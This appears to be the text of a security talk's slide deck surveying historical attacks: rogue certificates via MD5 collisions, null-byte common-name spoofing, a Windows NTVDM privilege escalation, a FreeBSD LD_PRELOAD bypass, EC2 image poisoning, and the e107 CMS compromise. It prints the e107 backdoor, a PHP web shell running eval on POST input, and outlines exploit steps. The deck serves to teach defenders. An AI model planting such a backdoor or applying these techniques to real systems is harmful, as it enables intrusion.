Attacks and Defences

Attacks and defences Or, really cool hacks [email_address]

About Us pta.za company +- 20 ppl Pen-testing for a living VMS training www.sensepost.com [email_address]

Why this talk? Explain a little about recent attacks Promote security FLOSS angle? hmmm. FLOSS also insecure? ZaCon (but only at the end, I promise)

x509 attack: MD5 Security of system rests in the certificate signature Security of signature lies in the hashing algorithm (Aside: hash function == one-way function that produces fixed size output. MD5, SHA1, RIPE-MD etc) If two certificates hash to the same value, then their signatures will be the same

x509 attack: MD5 Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger Figured out a way to create two colliding certificates Then found CAs issuing certs with MD5, with predictable sequence numbers

x509 attack: MD5 Attack was: Predict sequence number by purchasing a cert, +1000 Predict validity times Create two colliding certificates, one legit and the other evil. Legit cert assumes fixed seq # and validity. Submit CSR for legit cert Holds thumbs on the timing/sequence number Cut-n-paste the signature onto the evil cert

x509 attack: MD5 Collision attack perform on cluster of 200 PS3 Could perform 3 collisions in 72 hours Cost them $600 in purchased certs Earned a valid CA-cert

x509 attack: CN Moxie Marlinspike loves SSL He looked into how certs are issued and validated CSRs use ASN.1 to serialise their data Strings are prepended by their length Most libraries (by extension browsers) use C functions to validate certs Strings terminated by nulls

x509 attack: CN CN when evaluated in a CSR CN as seen by a browser

x509 attack: CN CA’s verify the domain from the end Browsers verify the domain from the front

x509 attack: CN No explicit ban on disallowed characters in the CN How about sending a NULL byte in a CSR www.cs.up.ac.za \0.sensepost.com CA validates from the end, and if we’re the owner of sensepost.com, then we get back a cert When victims receive the malicious cert, their libs validate from the beginning, halting at NULL

Validating the cert Checks performed by the library Certificate is signed by trusted CA Validity is fine CN appears to match hostname Great!

PKI attacks: cert checking Who was vulnerable? All NSS-based app Firefox Thunderbird ... IE Bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)

PKI attacks: cert checking More attacks including wildcard certs as well as remote buffer overflows thoughtcrime.org

Win32: privilege escalation Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy Poked around on Win32 Found a related bug in the 8086 simluator on Win32 Great example of long-standing bug (*) Ridiculous exploit Background...

Win32: 8086 simulator Win32 supports execution of real-mode code Simulated environment Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers. In real-mode, apps get to change segment registers which they can’t in protected mode. Monitor calls into NT kernel when needed, on behalf of the simulated app.

Win32: exploit description Spawn ‘cmd.exe’, grab handle Spawn ‘debug.exe’, which inits the NTVDM subsystem incl monitor Inject a DLL into the monitor DLL creates a fake kernel stack Creates a new VDM context Inserts a forged trap frame on the real stack, that points to fake kernel stack Executes code that gens a #GP trap handler on ‘iret’ Handler aborts early, forged frame restored. Control passes to attacker supplied code. Code searches for SYSTEM token and assigns it to the initial ‘cmd.exe’ Code cleans up completely and returns cmd.exe is now ‘SYSTEM’

FreeBSD: rtld dynamic linking environment variables LD_PRELOAD LD_PRELOAD=mylib.so ./myproggie useful: substitute standard calls etc etc will execute _init() from mylib.so before main() what about suid programs? gotta remove dangerous environmental variables like LD_PRELOAD

FreeBSD: rtld code if (suid) { ... unsetenv(“LD_PRELOAD”); unsetenv(“LD_LIBMAP”); ... } int __merge_environ(){ ... if (strchr(*env, ‘=’) == NULL) { return -1; ... int unsetenv(const char *name){ ... if (__merge_environ() == -1) { return -1; ... //unset env variable here

FreeBSD: rtld So, executing with a corrupted env means the unsetenv()s will be aborted early, and the linker didn’t check for this One corrupted environment is: { “moomoo”, “LD_PRELOAD=mylib.so” } This skips unsetting of env, but loader will still load the lib Now for the evilness...

e107 Backdoor Example of a real-world attack Popular Open Source CMS Large community / plugins /themes / blah blah A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009) On 25 Jan 2010, a mail appeared on FD

e107: backdoor code if(md5($_COOKIE['access-admin']) = "cf1afec15669cb96f09befb7d70f8bcb") { ... if(!empty($_POST['cmd'])) { $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } ... }

e107 Backdoor turns out they were owned through the SQLi bug attackers replaced download link with a link to the backdoored code

Let’s talk cloud computing (it’s hot right now, isn’t it?)

So, what exactly *is* the cloud?

What drives cloud adoption? Management by in-flight magazine Manager Version Geek Version Poor history from IT Economy is down Cost saving becomes more attractive Cloud computing allows you to move from CAPEX to OPEX (Private Clouds?)

Problems with cloud testing Transparency Privacy Compliance Legal Vendor Lock-in Availability

BlackHat talk summary Attacked SugarSync, SalesForce, Amazon, MobileMe Not enough time!!! Amazon it is then...

Amazon EC2 Elastic Compute Cloud Provides Xen platform for running virtual machines Easy (Web interface) Auto-scales Cheap Login, pick VM, boot, go!

Danger Out of 2700 images, 47 are provided by Amazon Are all secured equally? Tested by scanning each VM with Nessus 1293 Highs 646 Criticals Not good Incompetence aside, what can we ascribe to malice?

Can we get someone to run our machine? Bundle an image Register the image (Amazon assigns it an AMI-ID) Wait for someone to run it Profit! Alas... our AMI-ID is too low! Solution: do { /*register stuff */ } while (ami-id > threshold)

But there’s more Our race promoted our strangely named image (qscan) Let’s make it sexier fedora - taken fedora_core - taken redhat - taken fedora_core_11 - not taken!

What other cloud hacks? SugarSync password reset ClickJacking against SalesForce Porting Nikto into SalesForce License stealing from Amazon Image stealing from Amazon users Found bugs in MobileMe In a position to read Steve Wozniak’s mail :) www.sensepost.com/blog

Linux all kernels bugs are DoS not really. Tavis (remember him?) and Julien Tinnes found an exploitable bug in sendpage(), June 2009 >2.4.4 and all 2.6 kernels existed since 2001

Questions? [email_address] As promised: ZaCon -> community sec conference First edition in Nov ’09 Papers / vids / list details on the site http://zacon.org.za Attendees / speakers welcome Great venue for 1st-time speakers Look out for announcements.

Attacks and Defences

More Related Content

What's hot

Viewers also liked

Similar to Attacks and Defences

More from SensePost

Recently uploaded

Attacks and Defences